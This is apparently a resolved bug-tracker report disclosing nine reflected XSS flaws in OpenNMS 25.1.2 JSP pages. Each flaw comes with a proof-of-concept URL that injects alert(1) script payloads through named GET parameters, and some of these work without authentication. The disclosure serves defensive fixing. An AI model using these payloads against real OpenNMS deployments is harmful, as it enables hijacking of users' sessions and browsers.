Details
-
Sub-task
-
Status: Resolved (View Workflow)
-
Major
-
Resolution: Fixed
-
None
-
None
-
Security Level: Default (Default Security Scheme)
-
None
-
Horizon 2020 - March 18th, Horizon 2020 - April 1st
Description
##Reflected Cross-Site Scripting
We found 9 reflected XSS issues in the following files of OpenNMS 25.1.2:
load-assets.jsp:
https://github.com/OpenNMS/opennms/blob/master/core/web-assets/src/main/assets/static/load-assets.jsp
resultsIndexNoCount.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndexNoCount.jsp
resultsIndex.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndex.jsp
notification-box.jsp
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/notification-box.jsp
###1. load-assets.jsp
There are 2 reflected XSS issues in the file `load-assets.jsp`
Both issues can be triggered without authentication.
The first issue can be exploited via the GET parameter `asset-async` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=a%22%3Ealert(1)//&asset-media=b&asset-defer=true&asset=vaadin-theme&asset=print.js&asset-type=js`
The second issue can be exploited via the GET parameter `asset-media` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=&asset-media=b%22%3E%3Cscript%3Ealert(1)%3C/script%3E&asset-defer=true&asset=vaadin-theme&asset=print&asset-type=css`
###2. resultsIndexNoCount.jsp
There are 3 XSS issues in the file `resultsIndexNoCount.jsp`. These issues require the victim to be authenticated.
The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&multiplename=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&limitname=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
###3. resultsIndex.jsp
There are 3 XSS issues in the file `resultsIndex.jsp`. These issues require the victim to be authenticated.
The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&multiplename=a%22%3E%3Csvg/onload=alert(1)%3E`
The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&limitname=a%22%3E%3Csvg/onload=alert(1)%3E`
The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&limit=9`
###4. notification-box.jsp
There is 1 XSS issue in the file `notification-box.jsp` and can be triggered via the GET parameter `node` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/notification-box.jsp?node=tset%22%3E%3Csvg/onload=alert(1)%3E`
Information about fixing XSS issues can be found here: